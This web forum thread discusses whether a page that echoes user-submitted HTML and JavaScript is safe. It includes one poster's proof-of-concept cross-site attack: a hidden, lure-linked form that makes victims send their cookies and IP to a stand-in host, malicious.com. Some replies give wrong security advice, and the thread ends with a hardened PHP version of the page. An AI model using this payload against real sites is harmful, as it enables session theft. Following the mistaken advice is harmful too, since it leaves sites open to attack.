I made a script which allows users to test html and javascript code. Yes it is very simple. It just uses post data and then shows the post data on the page, it does not even save this data. I was wondering if this was a dangerous code for my site security though and wondered if hackers could use this to their benefit. I was wondering what they could do at worst and if I should upload this code to my site or not.
Thanks in advance.
Ehm...as long as it is neither stored nor shown to any other users it should be perfectly safe...
| dbdb wrote: |
I made a script which allows users to test html and javascript code. Yes it is very simple. It just uses post data and then shows the post data on the page, it does not even save this data. I was wondering if this was a dangerous code for my site security though and wondered if hackers could use this to their benefit. I was wondering what they could do at worst and if I should upload this code to my site or not.
Thanks in advance. |
Well... A malicious person can use it to steal all the cookies a user has from your site.
| MrBlueSky wrote: |
| dbdb wrote: | I made a script which allows users to test html and javascript code. Yes it is very simple. It just uses post data and then shows the post data on the page, it does not even save this data. I was wondering if this was a dangerous code for my site security though and wondered if hackers could use this to their benefit. I was wondering what they could do at worst and if I should upload this code to my site or not.
Thanks in advance. |
Well... A malicious person can use it to steal all the cookies a user has from your site. |
No...that would only be if the input was displayed to other users, surely
Proof of Concept:
A malicious person does something like this:
| Code: |
<script type="text/javascript">
str = escape('<script type="text/javascript">location.href="http://malicious.com/savecookie.php?cookies="+encodeURI(document.cookie);+"&ip=<?php echo $_SERVER['REMOTE_ADDR']; ?>"</script>');
document.form1.malcode.value = str;
</script>
<form method="POST" name="form1" action="http://yoursite.com/testhtml.php">
<INPUT type="hidden" name="malcode">
<a href="www.freepr0n.com" onclick="javascript:document.form1.submit()">Get free pr0n</a>
</form>
|
When he posts this on a (his) webpage, he gets the cookies for yoursite.com together with the user's IP when the user clicks on the link.
Whether you should worry about this happening is up to you. It isn't very likely when your site is small and/or not interesting for script kiddies.
| MrBlueSky wrote: |
Proof of Concept:
A malicious person does something like this:
| Code: |
<script type="text/javascript">
str = escape('<script type="text/javascript">location.href="http://malicious.com/savecookie.php?cookies="+encodeURI(document.cookie);+"&ip=<?php echo $_SERVER['REMOTE_ADDR']; ?>"</script>');
document.form1.malcode.value = str;
</script>
<form method="POST" name="form1" action="http://yoursite.com/testhtml.php">
<INPUT type="hidden" name="malcode">
<a href="www.freepr0n.com" onclick="javascript:document.form1.submit()">Get free pr0n</a>
</form>
|
When he posts this on a (his) webpage, he gets the cookies for yoursite.com together with the user's IP when the user clicks on the link.
Whether you should worry about this happening is up to you. It isn't very likely when your site is small and/or not interesting for script kiddies. |
Well...that depends whether the output is parsed by php.
if he uses something like the following:
| Code: |
| <?php echo $_POST['message']; ?> |
...then that wouldn't be a problem at all as the message isn't parsed by php...and the $_SERVER stuff therefore isn't available.
| LukeakaDanish wrote: |
Well...that depends whether the output is parsed by php.
if he uses something like the following:
| Code: |
| <?php echo $_POST['message']; ?> |
...then that wouldn't be a problem at all as the message isn't parsed by php...and the $_SERVER stuff therefore isn't available. |
The PHP is executed on malicious.com, so the IP is included in the JavaScript sent to the test page at yoursite.com (which happily sends it back to malicious.com together with the cookies). So that doesn't matter.
So tell me if I have this right. The user has to click this link on my site. So the only way that they can do that is if they type the code themselves, which is pointless.
Or is it you click the link on the malicious site which then redirects to the page with the link on it, and it depends on the user clicking it.
I don't really understand javascript. Sorry.
| dbdb wrote: |
Or is it you click the link on the malicious site which then redirects to the page with the link on it, and it depends on the user clicking it.
|
That's it exactly.
You don't even have to give a link: you could submit the form automatically, with no action from the user (because insecure browsers don't warn users when a form is submitted)
I think you should put an image verification before letting anybody submit your form, so that no hitrobot or any type of malicious program tries to misuse your form.
Perhaps you should prevent the user from executing any PHP code
If you're not sure, you could do it like this:
| Code: |
<?php
$submittedText = $_POST['submittedText'];
echo $submittedText;
?> |
Doing it this way will stop your code from being executed - it simply saves it to a temporary variable, then prints it out.
Good luck 
It shouldn't do any damage. If you decided to store the information in a database, a hacker might be able to get at it, though.
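A hardened form of the test page discussed in this thread, as an added example that is not from any poster. It keeps the page's purpose (rendering submitted HTML and JavaScript) while blocking the cross-site form post and the cookie read described above. The file name `testhtml.php` and field name `malcode` follow the proof of concept; the `csrf` field and the HTTPS assumption are hypothetical.

```php
<?php
// Added example: hardened "test your HTML" page (not code from the thread).

// Session cookie: unreadable from script and not sent on cross-site POSTs.
session_set_cookie_params([
    'httponly' => true,
    'samesite' => 'Strict',
    'secure'   => true,   // assumption: the site is served over HTTPS
]);
session_start();

// Per-session token that a form hosted on another site cannot know.
if (empty($_SESSION['csrf'])) {
    $_SESSION['csrf'] = bin2hex(random_bytes(32));
}

$isPost  = $_SERVER['REQUEST_METHOD'] === 'POST';
$tokenOk = $isPost
    && isset($_POST['csrf']) && is_string($_POST['csrf'])
    && hash_equals($_SESSION['csrf'], $_POST['csrf']);

if ($isPost && !$tokenOk) {
    // A form auto-submitted from a third-party page ends up here.
    http_response_code(403);
    exit('Invalid or missing form token.');
}

if ($tokenOk) {
    // "sandbox" without allow-same-origin gives the response an opaque
    // origin: scripts still run, but document.cookie for the site is
    // not accessible to them.
    header('Content-Security-Policy: sandbox allow-scripts');
    header('X-Content-Type-Options: nosniff');
    $code = $_POST['malcode'] ?? '';
    echo is_string($code) ? $code : '';
    exit;
}
?>
<form method="POST" action="testhtml.php">
  <input type="hidden" name="csrf"
         value="<?= htmlspecialchars($_SESSION['csrf'], ENT_QUOTES, 'UTF-8') ?>">
  <textarea name="malcode"></textarea>
  <button type="submit">Run</button>
</form>
```

If the page only needs to display the submitted text rather than run it, replacing the `echo` with `echo htmlspecialchars($code, ENT_QUOTES, 'UTF-8');` removes script execution entirely.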